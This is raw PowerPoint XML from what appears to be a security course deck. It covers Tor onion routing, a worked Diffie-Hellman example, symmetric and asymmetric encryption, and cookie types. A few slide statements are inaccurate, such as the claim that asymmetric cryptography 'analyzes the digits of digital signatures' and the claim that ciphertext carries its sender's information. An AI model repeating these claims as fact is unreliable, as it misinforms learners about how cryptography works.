            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196172728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No individual server ever knows the complete path between the orginal sender and receiver. If the uer wants to access another site, Alice's Tor client selects a second random path to form the 2nd circuit. " title="How Tor Works (3)"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="363924" y="1596472"/>
            <a:ext cx="8044095" cy="4425583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="365127"/>
            <a:ext cx="7886700" cy="1082674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another Onion Routing Example – Step (3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116903587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229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1436914"/>
            <a:ext cx="7886700" cy="4740049"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key negotiation is done by Diffie – Hellman Key exchange</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nested encryption process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cipher text will have information of its sender</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses Asymmetric Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18737928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F6A050-F01C-734B-8D23-B2A4EC8423E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="111351"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diffie – Hellman Key exchange (DH)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A11E9F0-BFB9-0743-8A91-307C17974187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1436914"/>
            <a:ext cx="3339193" cy="4740049"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>establishes a shared secret between two parties </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>used for secret communication for exchanging data over a public network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35EC710E-9D78-8940-9494-297D17758741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5088164" y="1025638"/>
            <a:ext cx="3263900" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E50A397F-5C34-4940-BCD9-15D1B23F5980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516164" y="5915353"/>
            <a:ext cx="4572000" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/wiki/Diffie–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>Hellman_key_exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64371192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A6024-94ED-1A4C-AB86-153C8B7C434A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="-76200"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptographic explanation of DH</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325AA4E-1FCC-5F4D-B0A8-8ECF96440162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254000" y="1402822"/>
            <a:ext cx="8890000" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3" tooltip="Alice and Bob"/>
              </a:rPr>
              <a:t>Alice and Bob</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> agree to use a modulus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 23 and base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 5 (which is a primitive root modulo 23).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice chooses a secret integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 4, then sends Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" baseline="30000" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> = 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" baseline="30000" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> mod 23 = 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bob chooses a secret integer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 3, then sends Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" baseline="30000" dirty="0" err="1"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" i="1" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> = 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" baseline="30000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> mod 23 = 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice computes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" baseline="30000" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> = 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" baseline="30000" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> mod 23 = 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bob computes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" baseline="30000" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> = 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" baseline="30000" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> mod 23 = 18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice and Bob now share a secret (the number 18).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Both Alice and Bob have arrived at the same value s, because, under mod p,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>modp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1"/>
              <a:t>ab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>modp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1"/>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>modp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>modp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13836866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8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric Cryptography involves an algorithm that analyzes the digits of digital signatures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The public key is used to encrypt plaintext and the private key decrypts the ciphertext, such as RSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33056273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1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encryption and Decryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Alice and Bob have a private key kept in secret and release a public key to the public. If Alice needs to send the message to Bob, she will use her private key to electronically sign the message and then use Bob's public key to encrypt the message. Once Bob receives the encrypted message. He will use his private key to decrypt the message and then use Alice's public key to decrypt Alice's signature to verify that the message is sent by Alice. " title="Example of Asymmetric Key Encryptiona and Decryption"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2359392" y="1791351"/>
            <a:ext cx="3886200" cy="4314825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21674155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Web Cookie Types (Cont’d)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628649" y="1825625"/>
            <a:ext cx="8094009" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SameSite Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cookie sent in requests originating from the same origin as the target domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site tracing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cross-site request forgery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third-party Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cookie’s domain is different from that of the website creating it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically used in advertising, for example, multiple websites can create cookies referring to the same advertising website which therefore can trace the user’s browsing history for advertising purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A website can set up several hundred third-party cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be blocked through browser security setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supercookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A cookie’s domain is top-level (e.g., .com) instead of specific (e.g., www.amazon.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually blocked, may cause severe security issue </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137808140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099D57-EC0A-1A42-8A0E-3DDE7CEF7352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465992" y="304800"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symmetric Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D8BDFE1-85CB-5E4C-B7D5-0BF99838BF3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A shared key used for encryption and decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such as DES and AES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Encryption Standard (DES) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Based on product originally designed in early 1970s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adopted as a standard by the U.S. government </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Triple Data Encryption standard (3DES) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed to replace DES </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses three rounds of encryption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ciphertext of first round becomes input for second iteration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most secure versions use different keys used for each round </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced Encryption Standard (AES) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301109632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Additional Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
